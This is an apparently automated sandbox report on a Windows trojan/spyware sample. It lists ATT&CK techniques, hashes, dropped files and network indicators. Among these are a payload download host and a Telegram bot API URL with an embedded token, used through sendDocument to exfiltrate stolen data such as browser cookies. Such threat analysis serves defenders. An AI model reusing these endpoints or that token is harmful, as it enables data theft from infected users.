Valid Accounts	Windows Management Instrumentation211	Path Interception	Exploitation for Privilege Escalation1	Disable or Modify Tools1	OS Credential Dumping2	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Web Service1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection212	Obfuscated Files or Information11	Input Capture121	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Credentials in Registry1	System Information Discovery117	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Encrypted Channel12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture121	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion131	LSA Secrets	Security Software Discovery141	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection212	Cached Domain Credentials	Virtualization/Sandbox Evasion131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware2.17994.exe	22%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.0.SecuriteInfo.com.W32.AIDetect.malware2.17994.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
1.2.SecuriteInfo.com.W32.AIDetect.malware2.17994.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
pomf.lain.la	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://pomf.lain.la/f/950pn9uLA	0%	Avira URL Cloud	safe
https://pomf.lain.la/z	0%	Avira URL Cloud	safe
https://api.telegram.org4ol	0%	Avira URL Cloud	safe
https://pomf.lain.la/	0%	Avira URL Cloud	safe
https://pomf.lain.la//950pn9	0%	Avira URL Cloud	safe
https://pomf.lain.la/f/950pn9iC:	0%	Avira URL Cloud	safe
http://cps.letsencrypG	0%	Avira URL Cloud	safe
https://pomf.lain.la/f/950pn9	0%	Avira URL Cloud	safe
http://r3.i.lencr.org/09	0%	Avira URL Cloud	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://Dqy0Z3bHZCPneMObjrm.net	0%	Avira URL Cloud	safe
https://pomf.lain.la/f/950pn9v	0%	Avira URL Cloud	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://RTkMtc.com	0%	Avira URL Cloud	safe
https://pomf.lain.la/f/950pn9otddrgbqdnfturlmon.dllB	0%	Avira URL Cloud	safe
https://api.telegram.orgD8ol	0%	Avira URL Cloud	safe
https://pomf.lain.la/f/950pn9PPC:	0%	Avira URL Cloud	safe
https://pomf.lain.la/f/950pn9l	0%	Avira URL Cloud	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://x1.i.lencr.orgr	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pomf.lain.la	198.244.149.184	true	false	3%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	false		high
http://cps.letsencrypt.org0	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://certificates.godaddy.com/repository/0	MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	false		high
https://pomf.lain.la/f/950pn9uLA	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260348376.0000000000B5A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://certs.godaddy.com/repository/1301	MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	false		high
http://crl.godaddy.com/gdig2s1-1823.crl0	MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	false		high
https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/sendDocument	MSBuild.exe, 00000003.00000002.519694442.0000000002F36000.00000004.00000001.sdmp	false		high
https://certs.godaddy.com/repository/0	MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	false		high
https://pomf.lain.la/z	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org4ol	MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pomf.lain.la/	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260969971.0000000000C5A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pomf.lain.la//950pn9	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260969971.0000000000C5A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.godaddy.com/gdroot-g2.crl0F	MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	false		high
https://pomf.lain.la/f/950pn9iC:	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.letsencrypG	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pomf.lain.la/f/950pn9	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251722526.0000000000CA4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://r3.i.lencr.org/09	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://Dqy0Z3bHZCPneMObjrm.net	MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.godaddy.com/gdroot.crl0F	MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	false		high
https://pomf.lain.la/f/950pn9v	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://r3.o.lencr.org0	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org%GETMozilla/5.0	MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	false	URL Reputation: safe	low
http://RTkMtc.com	MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp	false		high
https://pomf.lain.la/f/950pn9otddrgbqdnfturlmon.dllB	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260119604.00000000008F9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgD8ol	MSBuild.exe, 00000003.00000002.519935128.0000000002F90000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pomf.lain.la/f/950pn9PPC:	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260813872.0000000000C31000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	MSBuild.exe, 00000003.00000002.519935128.0000000002F90000.00000004.00000001.sdmp	false		high
http://certificates.godaddy.com/repository/gdig2.crt0	MSBuild.exe, 00000003.00000002.520169345.0000000003037000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 00000003.00000002.519694442.0000000002F36000.00000004.00000001.sdmp	false		high
https://pomf.lain.la/f/950pn9l	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.260348376.0000000000B5A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org%	MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000002.261834638.0000000005170000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://cps.root-x1.letsencrypt.org0	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.orgr	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe, 00000001.00000003.251851095.0000000000C6D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot1908206889:AAGLZ_7-FcFNV0_ZfJJC6AH7rI9MP-CHbsg/sendDocumentdocument-----	MSBuild.exe, 00000003.00000002.518897475.0000000002BD1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
198.244.149.184	pomf.lain.la	United States		18630	RIDLEYSD-NETUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	475297
Start date:	31.08.2021
Start time:	19:38:35
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.W32.AIDetect.malware2.17994.22795 (renamed file extension from 22795 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@5/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0.1%) Quality average: 85% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 77% Number of executed functions: 56 Number of non-executed functions: 115
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.50.102.62, 40.112.88.60, 209.197.3.8, 20.199.120.182, 80.67.82.235, 80.67.82.211, 20.82.210.154 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, store-images.s-microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:39:52	API Interceptor	794x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
149.154.167.220	PO 1800235.exe	Get hash	malicious	Browse
	PI Copy.exe	Get hash	malicious	Browse
	0044337.doc	Get hash	malicious	Browse
	Parts enquiry.exe	Get hash	malicious	Browse
	1Vk5s9G6NG.exe	Get hash	malicious	Browse
	Warehouse Products-7-14-2021 Fire Pits.exe	Get hash	malicious	Browse
	Order_HR4410.exe	Get hash	malicious	Browse
	quote.exe	Get hash	malicious	Browse
	RnZZR4Q3wj.exe	Get hash	malicious	Browse
	Y2v6x6iVR7.exe	Get hash	malicious	Browse
	TRF1RGXaI5.exe	Get hash	malicious	Browse
	defects.exe	Get hash	malicious	Browse
	LNDOBD5T48.apk	Get hash	malicious	Browse
	724-68839035 Shipment Documents.exe	Get hash	malicious	Browse
	F3xXMu7Ybx.exe	Get hash	malicious	Browse
	D0LnhFVo63.exe	Get hash	malicious	Browse
	26082021.doc	Get hash	malicious	Browse
	cargo waybill.exe	Get hash	malicious	Browse
	chii.exe	Get hash	malicious	Browse
	03_extracted.exe	Get hash	malicious	Browse
198.244.149.184	c7OCsX9lEL.exe	Get hash	malicious	Browse
	teklif talebi.exe	Get hash	malicious	Browse
	sVsRE9XVzH.exe	Get hash	malicious	Browse
	7qawuxeouS.exe	Get hash	malicious	Browse
	PDS20-218 (AC10) (AC37-1012) -Printed Material.xlsx	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.telegram.org	PO 1800235.exe	Get hash	malicious	Browse	149.154.167.220
	PI Copy.exe	Get hash	malicious	Browse	149.154.167.220
	0044337.doc	Get hash	malicious	Browse	149.154.167.220
	Parts enquiry.exe	Get hash	malicious	Browse	149.154.167.220
	Zo9BcXq2qB.exe	Get hash	malicious	Browse	149.154.167.220
	1Vk5s9G6NG.exe	Get hash	malicious	Browse	149.154.167.220
	Warehouse Products-7-14-2021 Fire Pits.exe	Get hash	malicious	Browse	149.154.167.220
	Order_HR4410.exe	Get hash	malicious	Browse	149.154.167.220
	quote.exe	Get hash	malicious	Browse	149.154.167.220
	RnZZR4Q3wj.exe	Get hash	malicious	Browse	149.154.167.220
	2wETbdUIFc.exe	Get hash	malicious	Browse	149.154.167.220
	Y2v6x6iVR7.exe	Get hash	malicious	Browse	149.154.167.220
	TRF1RGXaI5.exe	Get hash	malicious	Browse	149.154.167.220
	defects.exe	Get hash	malicious	Browse	149.154.167.220
	724-68839035 Shipment Documents.exe	Get hash	malicious	Browse	149.154.167.220
	F3xXMu7Ybx.exe	Get hash	malicious	Browse	149.154.167.220
	D0LnhFVo63.exe	Get hash	malicious	Browse	149.154.167.220
	26082021.doc	Get hash	malicious	Browse	149.154.167.220
	cargo waybill.exe	Get hash	malicious	Browse	149.154.167.220
	chii.exe	Get hash	malicious	Browse	149.154.167.220
pomf.lain.la	c7OCsX9lEL.exe	Get hash	malicious	Browse	198.244.149.184
	PO_594453.exe	Get hash	malicious	Browse	167.114.3.98
	teklif talebi.exe	Get hash	malicious	Browse	198.244.149.184
	sVsRE9XVzH.exe	Get hash	malicious	Browse	198.244.149.184
	32-08-2100A.exe	Get hash	malicious	Browse	107.191.99.49
	ATLAS RFQ 34245.xlsx	Get hash	malicious	Browse	107.191.99.49
	SOA.xlsx	Get hash	malicious	Browse	167.114.3.98
	Doc0294585692_exe.exe	Get hash	malicious	Browse	107.191.99.49
	7qawuxeouS.exe	Get hash	malicious	Browse	198.244.149.184
	49080008760980.exe	Get hash	malicious	Browse	107.191.99.49
	sample catalog_2021.exe	Get hash	malicious	Browse	167.114.3.98
	Bank Remittance Copy.exe	Get hash	malicious	Browse	167.114.3.98
	PDS20-218 (AC10) (AC37-1012) -Printed Material.xlsx	Get hash	malicious	Browse	198.244.149.184
	PO_220101089.exe	Get hash	malicious	Browse	167.114.3.98
	PI Copy.exe	Get hash	malicious	Browse	167.114.3.98
	SUPPLY_ORDER_QUOTE_88979_PDF.exe	Get hash	malicious	Browse	107.191.99.49

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	PO 1800235.exe	Get hash	malicious	Browse	149.154.167.220
	PI Copy.exe	Get hash	malicious	Browse	149.154.167.220
	vp2b4IP3Cx.dll	Get hash	malicious	Browse	149.154.167.99
	3MoUaeJmNn.exe	Get hash	malicious	Browse	149.154.167.99
	0044337.doc	Get hash	malicious	Browse	149.154.167.220
	Parts enquiry.exe	Get hash	malicious	Browse	149.154.167.220
	J11cZU1psq.exe	Get hash	malicious	Browse	149.154.167.99
	1Vk5s9G6NG.exe	Get hash	malicious	Browse	149.154.167.220
	Warehouse Products-7-14-2021 Fire Pits.exe	Get hash	malicious	Browse	149.154.167.220
	Order_HR4410.exe	Get hash	malicious	Browse	149.154.167.220
	quote.exe	Get hash	malicious	Browse	149.154.167.220
	RnZZR4Q3wj.exe	Get hash	malicious	Browse	149.154.167.220
	eXWNpcT8Q0.exe	Get hash	malicious	Browse	149.154.167.99
	uqcDRmIixY.exe	Get hash	malicious	Browse	149.154.167.99
	WupxjjTJ5v.exe	Get hash	malicious	Browse	149.154.167.99
	8kEt05MrNd.exe	Get hash	malicious	Browse	149.154.167.99
	mloklwllHo.exe	Get hash	malicious	Browse	149.154.167.99
	kBZehvBJYd.exe	Get hash	malicious	Browse	149.154.167.99
	1Ps8424by8.exe	Get hash	malicious	Browse	149.154.167.99
	Y2v6x6iVR7.exe	Get hash	malicious	Browse	149.154.167.220
RIDLEYSD-NETUS	c7OCsX9lEL.exe	Get hash	malicious	Browse	198.244.149.184
	teklif talebi.exe	Get hash	malicious	Browse	198.244.149.184
	sVsRE9XVzH.exe	Get hash	malicious	Browse	198.244.149.184
	7qawuxeouS.exe	Get hash	malicious	Browse	198.244.149.184
	PDS20-218 (AC10) (AC37-1012) -Printed Material.xlsx	Get hash	malicious	Browse	198.244.149.184
	sddj8VyFqS.dll	Get hash	malicious	Browse	198.244.169.192
	ndzyq.dll	Get hash	malicious	Browse	198.244.169.192
	document-47-2637.xls	Get hash	malicious	Browse	198.244.146.96
	document-47-2637.xls	Get hash	malicious	Browse	198.244.146.96
	document-47-2637.xls	Get hash	malicious	Browse	198.244.146.96
	document-47-2637.xls	Get hash	malicious	Browse	198.244.146.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Trojan.DownLoader41.54327.32057.exe	Get hash	malicious	Browse	149.154.167.220
	68EThDrp2k.exe	Get hash	malicious	Browse	149.154.167.220
	PO 1800235.exe	Get hash	malicious	Browse	149.154.167.220
	PO-0831 PDF.exe	Get hash	malicious	Browse	149.154.167.220
	PI Copy.exe	Get hash	malicious	Browse	149.154.167.220
	JCPKzYDrMp.exe	Get hash	malicious	Browse	149.154.167.220
	G7qS1yHlpT.exe	Get hash	malicious	Browse	149.154.167.220
	HiiaVRYsAm.exe	Get hash	malicious	Browse	149.154.167.220
	Scanned-Doc[_028DocAt.html	Get hash	malicious	Browse	149.154.167.220
	6Ttcu4rR5x.exe	Get hash	malicious	Browse	149.154.167.220
	NM10236540461.vbs	Get hash	malicious	Browse	149.154.167.220
	Launcher.exe	Get hash	malicious	Browse	149.154.167.220
	Warehouse Products-7-14-2021 Fire Pits.exe	Get hash	malicious	Browse	149.154.167.220
	Order_HR4410.exe	Get hash	malicious	Browse	149.154.167.220
	quote.exe	Get hash	malicious	Browse	149.154.167.220
	57W1abpSxu.exe	Get hash	malicious	Browse	149.154.167.220
	luJ6rWt8TR.exe	Get hash	malicious	Browse	149.154.167.220
	RnZZR4Q3wj.exe	Get hash	malicious	Browse	149.154.167.220
	e3siBGN3uz.exe	Get hash	malicious	Browse	149.154.167.220
	uqcDRmIixY.exe	Get hash	malicious	Browse	149.154.167.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\950pn9[1] Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe
File Type:	data
Category:	dropped
Size (bytes):	227053
Entropy (8bit):	7.970128543001109
Encrypted:	false
SSDEEP:	6144:e/it75AsyC6bWLgemQA9JDHo3rgLoyJzH+:oit7xyX9DHmrgLpR+
MD5:	4FBE43DFCA8480671C4756E93AB1A78C
SHA1:	56918E816551A5C5153BA76C8F07CF46666EE62F
SHA-256:	1E62864DA238E4396DEC785405F0A67806D16130DDD8FA7946E4D5666811B929
SHA-512:	8E37FFC5D193265351F43A5FAA28E189605B14AEE6E5812618B2714395A23398DF71ACDFF49422F018F5E26CF62A67BBCB854657C286D11C7AF2C14829EFB54D
Malicious:	false
Reputation:	low
Preview:	~.?n%.rh..%...8].9t.>.1f:....19VP...R...4O..55....o.03...x..6..r&.^...+>.w<. .%.;...oU..,........Qf..A....\/..f.-.^...t...7.....m.J.....\.P.LWIs.4{.-.K.tA..0...W..E.......le.f....O...........M.`.W...L...H9.".w].b13/4Yg....h.z...I......a.A..M.3....ID0:mc..6.o....tCZ..;^.nV..qXv.."...H...HQ.x...8.W?$.3..22..(.]{..?.P-..i4...O.....M..3.m....l.b.R.h#0... N....'..p...rC.v=...0l p?._..(.3...{Jx&Fu.K.E.....P...[ ......e@....=.m..>..]k..>.U.M.Py>.<q...+KZH.W\|Qu..\..M..*g.K.)."(e.D;..3$P...5..l.&.~.M.RG..LI...Q..y......E".-......N3..M0...f......ho.f.....I..5{.8....%...[/.1...'R^...d,....O..2.$.V...c..".9..3..<..5..Oy7.j....S.[A.[?..~..<J...K....L!..W.......Z...l....p..5.\|....X.cd8...;WQ....k.T.Ox6..s..3...&....z..M.....[Wd{.5Tf...J..:.....~..H................TFs.5H...R...5.mZBf....I.\|K...?..4...f.A..? .i.;....w-..5...M...~g.....A..n.......EZ...`...Eo=u.[..L...+..u. G`.T...y...Z...g..z......t3c1.......q.../...!..C...^.z#..s.......p......6.!b

C:\Users\user\AppData\Local\Temp\otddrgbqdnft Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe
File Type:	data
Category:	dropped
Size (bytes):	227053
Entropy (8bit):	7.970128543001109
Encrypted:	false
SSDEEP:	6144:e/it75AsyC6bWLgemQA9JDHo3rgLoyJzH+:oit7xyX9DHmrgLpR+
MD5:	4FBE43DFCA8480671C4756E93AB1A78C
SHA1:	56918E816551A5C5153BA76C8F07CF46666EE62F
SHA-256:	1E62864DA238E4396DEC785405F0A67806D16130DDD8FA7946E4D5666811B929
SHA-512:	8E37FFC5D193265351F43A5FAA28E189605B14AEE6E5812618B2714395A23398DF71ACDFF49422F018F5E26CF62A67BBCB854657C286D11C7AF2C14829EFB54D
Malicious:	false
Reputation:	low
Preview:	~.?n%.rh..%...8].9t.>.1f:....19VP...R...4O..55....o.03...x..6..r&.^...+>.w<. .%.;...oU..,........Qf..A....\/..f.-.^...t...7.....m.J.....\.P.LWIs.4{.-.K.tA..0...W..E.......le.f....O...........M.`.W...L...H9.".w].b13/4Yg....h.z...I......a.A..M.3....ID0:mc..6.o....tCZ..;^.nV..qXv.."...H...HQ.x...8.W?$.3..22..(.]{..?.P-..i4...O.....M..3.m....l.b.R.h#0... N....'..p...rC.v=...0l p?._..(.3...{Jx&Fu.K.E.....P...[ ......e@....=.m..>..]k..>.U.M.Py>.<q...+KZH.W\|Qu..\..M..*g.K.)."(e.D;..3$P...5..l.&.~.M.RG..LI...Q..y......E".-......N3..M0...f......ho.f.....I..5{.8....%...[/.1...'R^...d,....O..2.$.V...c..".9..3..<..5..Oy7.j....S.[A.[?..~..<J...K....L!..W.......Z...l....p..5.\|....X.cd8...;WQ....k.T.Ox6..s..3...&....z..M.....[Wd{.5Tf...J..:.....~..H................TFs.5H...R...5.mZBf....I.\|K...?..4...f.A..? .i.;....w-..5...M...~g.....A..n.......EZ...`...Eo=u.[..L...+..u. G`.T...y...Z...g..z......t3c1.......q.../...!..C...^.z#..s.......p......6.!b

C:\Users\user\AppData\Roaming\tkwxn2fr.kcn\Chrome\Default\Cookies Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.698304057893793
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
MD5:	3806E8153A55C1A2DA0B09461A9C882A
SHA1:	BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
SHA-256:	366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
SHA-512:	31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.497866910462094
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	SecuriteInfo.com.W32.AIDetect.malware2.17994.exe
File size:	421376
MD5:	074864aed555c328431042197f317b23
SHA1:	88578f80e1e81150e10582ca3dbd586cbc062277
